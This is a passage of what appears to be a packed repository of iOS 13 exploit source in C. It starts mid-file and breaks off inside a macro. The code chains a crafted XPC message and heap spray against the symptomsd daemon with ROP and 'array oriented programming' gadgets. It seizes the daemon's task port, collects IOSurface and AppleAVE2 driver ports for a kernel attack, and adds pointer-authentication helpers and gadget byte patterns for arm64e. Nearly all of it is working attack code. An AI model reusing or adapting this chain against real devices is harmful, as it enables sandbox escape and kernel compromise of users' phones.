around this is \"passively\" passing to us, like use task_get_special_port/task_set_special_port trick\n     */\n    \n    // Opening and passing kernel driver ports to us.\n    aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+52);\n    aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n    \n    aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_SEATBELT_PORT, 0x414141, 0);\n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0); // Waiting for us to notify pwned proc we got the port\n    \n    aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+64);\n    aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n    \n    aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_ACCESS_PORT, 0x414141, 0);\n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n    \n    // Waiting for overwriting over the iosurface mapping memory, key to trigger vulnerability in kernel\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg3, 0, 0, 0);\n    \n    // Perform cross-task memory mapping\n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+76, remote_recvmsg3+24);\n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+80, remote_recvmsg3+28); // src addr which is the remote mapping addr\n    aop_FuncCALL(mach_msg_send, vm_remap_rawmsg, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, vm_remap_rawmsg, 0, 0, 0);\n    \n    // send remap addr to us\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+24, vm_remap_rawmsg+36);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+28, vm_remap_rawmsg+40); // src addr which is the remote mapping addr\n    aop_FuncCALL(mach_msg_send, remote_sendmsg3, 0, 0, 0);\n    \n    // Block here to waiting for finish exploitation\n    
aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0);\n    \n    // Duty completed\n    aop_FuncCALL(exit, 0, 0, 0, 0);\n    \n    //printf(\"_aop_data_offset: 0x%x\\n\", _aop_data_offset);\n    //printf(\"_aop_FuncCALL_offset: 0x%x\\n\", _aop_FuncCALL_offset);\n    //printf(\"_aop_FuncCALL_primer_offset: 0x%x\\n\", _aop_FuncCALL_primer_offset);\n}\n\nvoid Assemble_part1_ROP(uint64_t *rop2_stack, uint64_t rop2_start_address){\n    // Still need little bit ROP to convert \"retain\" call into \"release\", from that point on, AOP gadget can be re-used\n    \n    rop2_stack[OF(0x0)] = rop2_start_address + 0x40;\n    \n    rop2_stack[OF(0x20)] = (uint64_t)dlsym((void*)-2, \"objc_release\"); // Next JMP\n    rop2_stack[OF(0x28)] = rop2_start_address + 0x80; // Reset x0\n    \n    rop2_stack[OF(0x50)] = *rop2_stack + 0x28;\n    rop2_stack[OF(0x58)] = 0;\n    rop2_stack[OF(0x60)] = 0;\n    rop2_stack[OF(0x68)] = *rop2_stack ^ Gadget_control_x0x2; // Again take over PC\n    rop2_stack[OF(0x70)] = (uint64_t)sel_registerName(\"retain\");\n    \n    Assemble_part2_AOP((uint64_t *)((char*)rop2_stack + 0x80), rop2_start_address + 0x80);\n}\n\nvoid xpc_conn_test_exp2(){\n    \n    xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n        printf(\"replyA\\n\");\n        char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n        printf(\"erra: %s\\n\", err);\n    });\n    xpc_connection_resume(xpcconn);\n    \n    size_t payload_size = 8 + 72 + 100 + 6; // payload head + 1st tlv length + 1st tlv body + beginning of 2nd tlv (To break the loop)\n    char *payload = malloc(payload_size);\n    bzero(payload, payload_size);\n    \n    // 4 + 72 + (>3)\n    // _eventData: 4 ~ 72\n    \n    *(uint16_t*)payload = 2; // case ? 
for switch statement\n    *(uint16_t*)(payload + 2) = 72; // len for SYMTLV_SYM_BASIC\n    *(uint8_t*)(payload + 11) = 0x40; // Do not let it passes: if ( !(*(_BYTE *)(payload + 11) & 0x40) )\n    *(uint16_t*)(payload + 72 + 4) = 8; // Do not let it passes: if ( *(_WORD *)(payload_ing_inner + *(uint16_t*)(payload + 2) + 4) != 8 )\n    \n    char *payload_inner = payload + 72 + 4;\n    \n    *(uint16_t*)(payload_inner + 2) = 100; // v45\n    // Do not let these pass: if ( v45 & 3 )\n    //                        if ( payload_remain_len < v45 + 4 )    //payload_remain_len: payload_size - 72 - 4\n    //                        if ( (unsigned int)v45 <= 11 )\n    //                        if ( v47 + 8 > v45 )                   //v47: *(uint32_t*)(payload_inner + 8)\n    *(uint32_t*)(payload_inner + 8) = 100 - 8; // provided EventKey max length\n    *(uint32_t*)(payload_inner + 4) = 0xFFFFFFFF; // Must let it passes: if( _bittest((int*)(payload_inner + 4), 29u) )\n    strcpy(payload_inner + 12, \"com.apple.symptoms.test.request-passthrough\");\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_data(msg, \"payload\", payload, payload_size);\n    \n    \n    // for spray\n    uint32_t dispatchData_len = 0x20000;\n    void *dispatchData = malloc(dispatchData_len);\n    bzero(dispatchData, dispatchData_len);\n    \n    for(int i=0; i<dispatchData_len; i=i+0x4000){\n        char *each_page_spray = dispatchData + i;\n        \n        /*\n         Now fake cls point to 0x150010110\n         */\n        \n        Assemble_part1_ROP((uint64_t*)each_page_spray, SPRAY_ADDRESS);\n    }\n    \n    xpc_object_t sprayarr = xpc_array_create(NULL, 0);\n    xpc_object_t spraydata = xpc_data_create(dispatchData, dispatchData_len);\n    \n    for(int i=0; i<13000; i++){\n        xpc_array_append_value(sprayarr, spraydata);\n    }\n    xpc_dictionary_set_value(msg, \"spray\", sprayarr);\n    \n    // ports spray\n    \n    \n    
xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n        printf(\"replyB: %s\\n\", xpc_copy_description(object));\n    });\n}\n\nmach_port_t symptomsd_bsport = 0;\nuint32_t Retrieve_symptomsd_bootstrap_port(){\n    if(symptomsd_bsport)\n        return symptomsd_bsport;\n    bootstrap_look_up(bootstrap_port, TARGET_MACH_SERVICE, &symptomsd_bsport);\n    if(!symptomsd_bsport){\n        printf(\"%s bootstrap_look_up failed\\n\", TARGET_MACH_SERVICE);\n        return 0;\n    }\n    return symptomsd_bsport;\n}\n\nbool Send_our_serverport(){\n    struct {\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t our_recv_port;\n        mach_msg_port_descriptor_t our_task_port;\n        mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n        mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.Head.msgh_id = 0x8888;\n    msg.msgh_body.msgh_descriptor_count = 4;\n    msg.our_recv_port.name = our_serverport;\n    msg.our_recv_port.disposition = MACH_MSG_TYPE_MAKE_SEND;\n    msg.our_recv_port.type = MACH_MSG_PORT_DESCRIPTOR;\n    msg.our_task_port.name = mach_task_self();\n    msg.our_task_port.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.our_task_port.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    extern CFMutableDictionaryRef IOServiceMatching(const char *name);\n    extern io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching);\n    \n    msg.IOSurfaceRoot_servport.name = IOServiceGetMatchingService(0, IOServiceMatching(\"IOSurfaceRoot\"));\n    msg.IOSurfaceRoot_servport.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.IOSurfaceRoot_servport.type = 
MACH_MSG_PORT_DESCRIPTOR;\n    \n    msg.AppleAVE2Driver_servport.name = IOServiceGetMatchingService(0, IOServiceMatching(\"AppleAVE2Driver\"));\n    msg.AppleAVE2Driver_servport.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.AppleAVE2Driver_servport.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n    {\n        // Check if our msg has been received yet\n        bzero(&msg.Head, sizeof(msg));\n        msg.Head.msgh_size = sizeof(msg);\n        msg.Head.msgh_local_port = our_serverport;\n        \n        if(mach_msg(&msg.Head, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, msg.Head.msgh_size, msg.Head.msgh_local_port, 500, 0))\n            return false;\n    }\n    \n    return true;\n}\n\nmach_port_t Retrieve_symptomsd_task_port(){\n    struct {\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t port;\n        mach_msg_trailer_t trailer;\n    }msg = {0};\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_local_port = our_serverport;\n    int mrr = mach_msg_receive(&msg.Head);\n    \n    if(mrr != 0){\n        printf(\"Error occurred when Retrieve_symptomsd_task_port(0x%x)\\n\", mrr);\n        return 0;\n    }\n    return msg.port.name;\n}\n\nvoid Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *local_map_addr){\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t remote_map_addr;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.remote_map_addr = remote_map_addr;\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t local_map_addr;\n        mach_msg_trailer_t trailer;\n    }msg2 = {0};\n    msg2.Head.msgh_size = sizeof(msg2);\n    msg2.Head.msgh_local_port = 
our_serverport;\n    int rt = mach_msg_receive(&msg2.Head);\n    \n    printf(\"vm remap: 0x%x local_map_addr: 0x%llx\\n\", rt, msg2.local_map_addr);\n    *local_map_addr = msg2.local_map_addr;\n}\n\nvoid Reply_notify_completion(){\n    struct {\n        mach_msg_header_t Head;\n        mach_msg_trailer_t trailer;\n    }msg = {0};\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_local_port = our_serverport;\n    mach_msg_receive(&msg.Head);\n}\n\nvoid Send_notify_msg(){\n    struct {\n        mach_msg_header_t Head;\n    }msg = {0};\n    msg.Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n}\n\n// below are testing code\n\nvoid new_guard_thing_test(){\n    kern_return_t (*mach_port_guard_with_flags)\n    (\n     ipc_space_t task,\n     mach_port_name_t name,\n     mach_port_context_t guard,\n     uint64_t flags\n     ) = 0x1aafb0584;\n    \n    io_service_t ioserv = IOServiceGetMatchingService(0, IOServiceMatching(\"AppleSPUProfileDriver\"));\n    printf(\"ioserv: 0x%x\\n\", ioserv);\n    \n#define MPG_STRICT              0x01    /* Apply strict guarding for a port */\n#define MPG_IMMOVABLE_RECEIVE   0x02    /* Receive right cannot be moved out of the space */\n    \n    //int kr = mach_port_guard_with_flags(mach_task_self(), ioserv, 2, MPG_IMMOVABLE_RECEIVE);\n    //printf(\"0x%x\\n\", kr);\n}\n\nvoid io_test(){\n    io_service_t ioserv = IOServiceGetMatchingService(0, IOServiceMatching(\"IOSurfaceRoot\"));\n    printf(\"ioserv: 0x%x\\n\", ioserv);\n    io_connect_t ioconn = 0;\n    IOServiceOpen(ioserv, mach_task_self(), 0, &ioconn);\n    printf(\"ioconn: 0x%x\\n\", ioconn);\n    \n    // test if a IOconn thats accessible from within the sandbox, will that trigger PORT_GUARD crash when pass from other proc\n    // YES!\n    // So IOServiceOpen has 
been mitigated in particular\n    // then test if such mitigation also applied to user app\n    \n    printf(\"bootstrap server: 0x%x\\n\", Retrieve_symptomsd_bootstrap_port());\n    \n    struct {\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_ool_ports_descriptor_t test_port;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.msgh_body.msgh_descriptor_count = 1;\n    ioconn = mach_task_self();\n    msg.test_port.address = &ioconn;\n    msg.test_port.count = 1;\n    msg.test_port.copy = MACH_MSG_VIRTUAL_COPY;\n    msg.test_port.deallocate = false;\n    msg.test_port.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.test_port.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n}\n\nkern_return_t print_all_ports(){\n    task_t TargetTask = mach_task_self();\n    kern_return_t kr;\n    mach_port_name_array_t portNames = NULL;\n    mach_msg_type_number_t portNamesCount;\n    mach_port_type_array_t portRightTypes = NULL;\n    mach_msg_type_number_t portRightTypesCount;\n    mach_port_right_t p;\n    \n    kr = mach_port_names(TargetTask,&portNames,&portNamesCount,&portRightTypes,&portRightTypesCount);\n    if(kr!=KERN_SUCCESS){\n        fprintf(stderr,\"Error getting mach_port_Names.. 
%d\\n\",kr);\n        return (kr);\n    }\n    \n    for(p=0;p<portNamesCount;p++){\n        //convert type to string\n        mach_port_type_t port_type = portRightTypes[p];\n        char *type_str = NULL;\n        if(port_type==MACH_PORT_TYPE_NONE){\n            type_str = \"NONE\"; //0x0000\n        }\n        if(port_type==MACH_PORT_TYPE_SEND){\n            type_str = \"SEND\"; //0x10000\n        }\n        if(port_type==MACH_PORT_TYPE_RECEIVE){\n            type_str = \"RECEIVE\"; //0x20000\n        }\n        if(port_type==MACH_PORT_TYPE_SEND_ONCE){\n            type_str = \"SEND_ONCE\"; //0x40000\n        }\n        if(port_type==MACH_PORT_TYPE_PORT_SET){\n            type_str = \"PORT_SET\"; //0x80000\n        }\n        if(port_type==MACH_PORT_TYPE_DEAD_NAME){\n            type_str = \"DEAD_NAME\"; //0x100000\n        }\n        if(port_type==MACH_PORT_TYPE_LABELH){\n            type_str = \"LABELH\"; //0x200000\n        }\n        \n        //convenient combinations\n        if(port_type==MACH_PORT_TYPE_SEND_RECEIVE){\n            type_str = \"SEND_RECEIVE\"; //0x30000\n        }\n        if(port_type==MACH_PORT_TYPE_SEND_RIGHTS){\n            type_str = \"SEND_RIGHTS\"; //0x50000\n        }\n        if(port_type==MACH_PORT_TYPE_PORT_RIGHTS){\n            type_str = \"PORT_RIGHTS\"; //0x70000\n        }\n        if(port_type==MACH_PORT_TYPE_PORT_OR_DEAD){\n            type_str = \"OR_DEAD\"; //0x170000\n        }\n        if(port_type==MACH_PORT_TYPE_ALL_RIGHTS){\n            type_str = \"ALL_RIGHTS\"; //0x1f0000\n        }\n        \n        if(type_str!=NULL)\n            printf(\"0x%x %s\\n\",portNames[p],type_str);\n        else\n            printf(\"0x%x 0x%x\\n\",portNames[p],port_type);\n    }\n    return 0;\n}\n\nchar _tempfile1_path[256] = {0};\nchar *Get_tempfile1_path(){\n    \n    if(strlen(_tempfile1_path) != 0)\n        return _tempfile1_path;\n    \n    confstr(_CS_DARWIN_USER_TEMP_DIR, _tempfile1_path, sizeof(_tempfile1_path));\n    
strcat(_tempfile1_path, \"12asufh\");\n    return _tempfile1_path;\n}\n\n\nvoid trit (io_iterator_t it,int index){\n    io_service_t ioserv;\n    io_name_t ioname;\n    IORegistryIteratorEnterEntry(it);\n    \n    index +=2;\n    \n    while ( (ioserv = IOIteratorNext(it))){\n        IOObjectGetClass(ioserv, ioname);\n        for(int i=0;i<index;i++)\n            printf(\"-\");\n        printf(\" Found: %s\\n\", ioname);\n        \n        trit(it,index);\n    }\n    IORegistryIteratorExitEntry(it);\n    index-=2;\n}\n\nvoid print_cbuf(uint8_t *buf, size_t len){\n    printf(\"uint8_t c_arrays[%lu] = {\",(unsigned long)len);\n    size_t tmpsize = 0;\n    for(tmpsize = 0x0; tmpsize < len; tmpsize++){\n        if(tmpsize+1 == len)\n            printf(\"0x%x}\", *(buf + tmpsize));\n        else\n            printf(\"0x%x,\", *(buf + tmpsize));\n    }\n}\n\nvoid Send_overwritting_iosurfaceMap22(uint64_t our_data_addr, uint64_t our_data_len, uint64_t remote_map_addr){\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t our_data_addr;\n        uint64_t our_data_len;\n        uint64_t remote_map_addr;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.our_data_addr = our_data_addr;\n    msg.our_data_len = our_data_len;\n    msg.remote_map_addr = remote_map_addr;\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n}\n\nvoid print_char(uint8_t *data_ptr, size_t data_size){\n    printf(\"uint8_t c_arrays[%lu] = {\",(unsigned long)data_size);\n    size_t additional_size = 0;\n    for(additional_size = 0x0;additional_size<data_size;additional_size++){\n        if(additional_size+1==data_size)\n            printf(\"0x%x}\",*(data_ptr+additional_size));\n        else\n            printf(\"0x%x,\",*(data_ptr+additional_size));\n    }\n}\n\nvoid iOS13_exploit_init(){\n    
int kr = 0;\n    \n    if(setjmp(jmpb))\n        return;\n    \n    Find_Gadgets_speed();\n    printf(\"Dyldcache and Gadgets Ready!\\n\");\n    \n    Prepare_our_Mach_server();\n    //printf(\"Our Mach Server Ready! 0x%x\\n\", our_serverport);\n    \n    xpc_conn_test_exp1();\n    xpc_conn_test_forTrigger();\n    xpc_conn_test_exp2();\n    \n    printf(\"Passing our server port to the target...\\n\");\n    while(1){\n        // loop here, waiting to be notified that they got the message\n        usleep(5000);\n        if(Send_our_serverport())\n            break;\n    }\n    \n    printf(\"Retrieving pwned proc's task port...\\n\");\n    task_t symptomsd_task = Retrieve_symptomsd_task_port();\n    printf(\"  symptomsd_task: 0x%x\\n\", symptomsd_task);\n    \n    pid_t symptomsd_pid = 0;\n    kr = pid_for_task(symptomsd_task, &symptomsd_pid);\n    if(kr == KERN_SUCCESS){\n        printf(\"task port: 0x%x, pwned proc's pid: %d\\n\", symptomsd_task, symptomsd_pid);\n    }\n    else{\n        printf(\"task port: 0x%x, but pid_for_task failed (kr: 0x%x)\\n\", symptomsd_pid, kr);\n    }\n    \n    // Ask the unsandbox daemon which has been totally controlled at this moment\n    // To open IO device ports, and passing to us for next stage kernel attacking.\n    //printf(\"Collecting Kernel attack surface:\\n\");\n    \n    Reply_notify_completion(); // Waiting for pwned proc preparing port\n    \n    uint32_t IOSurfaceRootUserClient_port = 0;\n    task_get_special_port(symptomsd_task, TASK_SEATBELT_PORT, &IOSurfaceRootUserClient_port);\n    printf(\"  1/2: 0x%x\\n\", IOSurfaceRootUserClient_port);\n    \n    Send_notify_msg();\n    Reply_notify_completion(); // Waiting preparing another port\n    \n    uint32_t AppleAVE2UserClient_port = 0;\n    task_get_special_port(symptomsd_task, TASK_ACCESS_PORT, &AppleAVE2UserClient_port);\n    printf(\"  2/2: 0x%x\\n\", AppleAVE2UserClient_port);\n    \n    printf(\"Stage update: now attacking kernel...\\n\");\n    
printf(\"1\\n\");\n    \n    void kernel_exp_start(uint32_t ave_ioconn, uint32_t surface_ioconn);\n    kernel_exp_start(AppleAVE2UserClient_port, IOSurfaceRootUserClient_port);\n}\n\n#endif\n\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/ios13_userspace_pac.c",
    "content": "//\n//  ios13_userspace_pac.c\n//  ios13_app1\n//\n//  Created by bb on 1/12/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n#if __arm64e__\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <string.h>\n#include <setjmp.h>\n#include <dlfcn.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n#include <mach/mach.h>\n#include <mach/vm_map.h>\n#include <mach/thread_status.h>\n#include <mach-o/dyld.h>\n#include <mach-o/loader.h>\n#include <mach-o/dyld_images.h>\n#include <objc/runtime.h>\n#include <objc/message.h>\n#include <pthread/pthread.h>\n#include <copyfile.h>\n#include <CoreFoundation/CoreFoundation.h>\n#include <sys/time.h>\n#include <ptrauth.h> // For PAC-device(arm64e) support\n#include \"IOKitLib.h\"\n#include \"xpc.h\"\n\nextern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n\n#pragma pack(4)\n\n#define SPRAY_ADDRESS 0x150010000\n\n#define TARGET_MACH_SERVICE \"com.apple.usymptomsd\"\n#define TARGET_MACH_SERVICE_2 \"com.apple.symptoms.symptomsd.managed_events\"\n\n#define OF(offset) (offset)/sizeof(uint64_t)\n#define exit(X) longjmp(jmpb, 1)\n\njmp_buf jmpb;\n\nuint64_t PACSupport_pacdza(uint64_t data_ptr){\n    \n    const char *unused_fmt = \"\";\n    printf(unused_fmt, data_ptr);\n    __asm__ __volatile__(\"mov %0, x8\"\n                         ::\"r\"(data_ptr));\n    __asm__ __volatile__(\n                         \"pacdza    x8\\n\"\n                         \"mov %0, x8\\n\"\n                         :\"=r\"(data_ptr));\n    return data_ptr;\n}\n\nuint64_t PACSupport_paciza(uint64_t code_ptr){\n    \n    const char *unused_fmt = \"\";\n    printf(unused_fmt, code_ptr);\n    __asm__ __volatile__(\"mov %0, x8\"\n                         ::\"r\"(code_ptr));\n    __asm__ __volatile__(\n                         \"paciza    x8\\n\"\n                         \"mov %0, x8\\n\"\n                         :\"=r\"(code_ptr));\n    return code_ptr;\n}\n\nuint64_t 
PACSupport_pacia(uint64_t code_ptr, uint64_t modifier){\n    \n    __asm__ __volatile__(\n                         \"pacia    x0, x1\\n\"\n                         \"mov    x18, x0\\n\"\n                         \"mov    %0, x18\\n\"\n                         :\"=r\"(code_ptr));\n    return code_ptr;\n}\n\nuint64_t PACSupport_xpaci(void *code_ptr){\n    return (uint64_t)ptrauth_strip(code_ptr, ptrauth_key_asia);\n}\n\nuint64_t PACSupport_addMask(uint64_t data_ptr, uint32_t mask){\n    \n    /*\n     Commonly used in cooperate with \"blraa\"\n     \n     0000000190e0db00    ldraa    x9, [x8, #0x10]!\n     0000000190e0db04    movk    x8, #0x165d, lsl #48\n     0000000190e0db08    blraa    x9, x8\n     */\n    \n    data_ptr |= (((uint64_t)mask) << 48);\n    return data_ptr;\n}\n\n#pragma mark AOP Gadgets\n// AOP: Array Oriented Programming\n\nvoid *dylibcache_start = NULL;\nsize_t dylibcache_size = 0;\n\nbool isPartOf_dyldcache(vm_address_t addr){\n    vm_size_t size = 0;\n    natural_t depth = 0;\n    vm_region_submap_info_data_64_t info;\n    mach_msg_type_number_t info_cnt = VM_REGION_SUBMAP_INFO_COUNT_64;\n    if(vm_region_recurse_64(mach_task_self(), &addr, &size, &depth, (vm_region_info_t)&info, &info_cnt))\n        return false;\n    if(info.share_mode == SM_TRUESHARED)\n        return true;\n    return false;\n}\n\nsize_t Get_loaded_dylib_size(void *dylib_address){\n    struct mach_header *mh = (struct mach_header*)dylib_address;\n    const uint32_t cmd_count = mh->ncmds;\n    struct load_command *cmds = (struct load_command*)((char*)mh+sizeof(struct mach_header_64));\n    struct load_command* cmd = cmds;\n    for (uint32_t i = 0; i < cmd_count; ++i){\n        switch (cmd->cmd) {\n            case LC_SEGMENT_64:{\n                struct segment_command_64 *seg = (struct segment_command_64*)cmd;\n                if(!strcmp(seg->segname,\"__TEXT\")){\n                    return seg->vmsize;\n                }\n            }\n                break;\n        }\n  
      cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n    }\n    return 0;\n}\n\nvoid Find_dylibcache(){\n    \n    vm_address_t minAddr = 0;\n    vm_address_t maxAddr = 0;\n    \n    for (uint32_t i = 0; i < _dyld_image_count(); i++){\n        uint64_t addr = (uint64_t)_dyld_get_image_header(i);\n        const char *name = _dyld_get_image_name(i);\n        if(strncmp(name, \"/System/\", 8) && strncmp(name, \"/usr/\", 5))\n            continue;\n        if(!isPartOf_dyldcache(addr))\n            continue;\n        if(!minAddr || addr < minAddr)\n            minAddr = addr;\n        if(addr > maxAddr)\n            maxAddr = addr;\n    }\n    \n    if(!minAddr||!maxAddr){\n        printf(\"dylibcache Not Ready!\\n\");\n        exit();\n    }\n    \n    size_t last_dylib_size = Get_loaded_dylib_size((void*)maxAddr);\n    \n    dylibcache_start = (void*)minAddr;\n    dylibcache_size = (size_t)((maxAddr + last_dylib_size) - minAddr);\n    \n    printf(\"Dylibcache range: %p - %p\\n\", dylibcache_start, dylibcache_start + dylibcache_size);\n}\n\nuint64_t find_gadget(char *bytes, size_t len){\n    void *addr = memmem(dylibcache_start, dylibcache_size, bytes, len);\n    if(!addr){\n        printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n    }\n    return (uint64_t)addr;\n}\n\nuint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_start, uint64_t findingRange_size){\n    void *addr = memmem(findingRange_start, findingRange_size, bytes, len);\n    if(!addr){\n        //printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n    }\n    return (uint64_t)addr;\n}\n\nchar _bytes_dualJump_ios12[] = {\n    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]\n    0x09, 0x3D, 0x20, 0xF8, // ldraa  x9, [x8, #0x18]!\n    0x48, 0x15, 0xEE, 0xF2, // movk   x8, #0x70aa, lsl #48\n    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8\n    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]\n    0xE8, 0x3B, 0xC1, 0xDA, // autdza x8\n    0x09, 0x01, 0x40, 0xF9, // ldr    x9, [x8]\n    0xA8, 
0x39, 0xFF, 0xF2, // movk   x8, #0xf9cd, lsl #48\n    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8\n};\nchar _bytes_dualJump_ios13[] = {\n    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]\n    0x09, 0x3D, 0x20, 0xF8, // ldraa  x9, [x8, #0x18]!\n    0x48, 0x92, 0xFA, 0xF2, // movk   x8, #0xd492, lsl #48\n    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8\n    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]\n    0x09, 0x0D, 0x20, 0xF8, // ldraa  x9, [x8, #0x0]!\n    0xA8, 0x39, 0xFF, 0xF2, // movk   x8, #0xf9cd, lsl #48\n    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8\n};\n#define _Gadget_dualJump  find_gadget(_bytes_dualJump_ios13,sizeof(_bytes_dualJump_ios13))\nuint64_t Gadget_dualJump = 0;\n\n// ldr x0, [x0] ; xpacd  x0 ; ret\n#define _Gadget_strip_x0  find_gadget((char[]){0x00,0x00,0x40,0xF9,0xE0,0x47,0xC1,0xDA,0xC0,0x03,0x5F,0xD6},12)\nuint64_t Gadget_strip_x0 = 0;\n\nchar _bytes_control_x0x2[] = {\n    0xF3, 0x03, 0x00, 0xAA, // mov    x19, x0\n    0x08, 0x00, 0x42, 0xA9, // ldp    x8, x0, [x0, #0x20]\n    0x61, 0x3A, 0x40, 0xB9, // ldr    w1, [x19, #0x38]\n    0x62, 0x1A, 0x40, 0xF9, // ldr    x2, [x19, #0x30]\n    0x1F, 0x09, 0x3F, 0xD6, // blraaz x8\n};\n#define _Gadget_control_x0x2 find_gadget_speed(_bytes_control_x0x2,sizeof(_bytes_control_x0x2),findingRange_start,findingRange_size)\nuint64_t Gadget_control_x0x2 = 0;\n\nchar _bytes_memcopy[] = {\n    0x08, 0x00, 0x40, 0xB9, // ldr    w8, [x0]\n    0x68, 0x00, 0x00, 0xB9, // str    w8, [x3]\n    0xC0, 0x03, 0x5F, 0xD6, // ret\n};\n#define _Gadget_memcopy find_gadget_speed(_bytes_memcopy,sizeof(_bytes_memcopy),findingRange_start,findingRange_size)\nuint64_t Gadget_memcopy = 0;\n\n#define aop_FuncCALL(FUNC, ARG1, ARG2, ARG3, ARG4) \\\nspraymem[OF(_aop_FuncCALL_primer_offset)] = spray_start_address + _aop_FuncCALL_offset; \\\n{char *func_call_payload = ((char*)spraymem) + _aop_FuncCALL_offset; \\\n_aop_FuncCALL_primer_offset += 8; \\\n_aop_FuncCALL_offset += 0x74; \\\n*(uint32_t*)(func_call_payload + 20) = 53; 
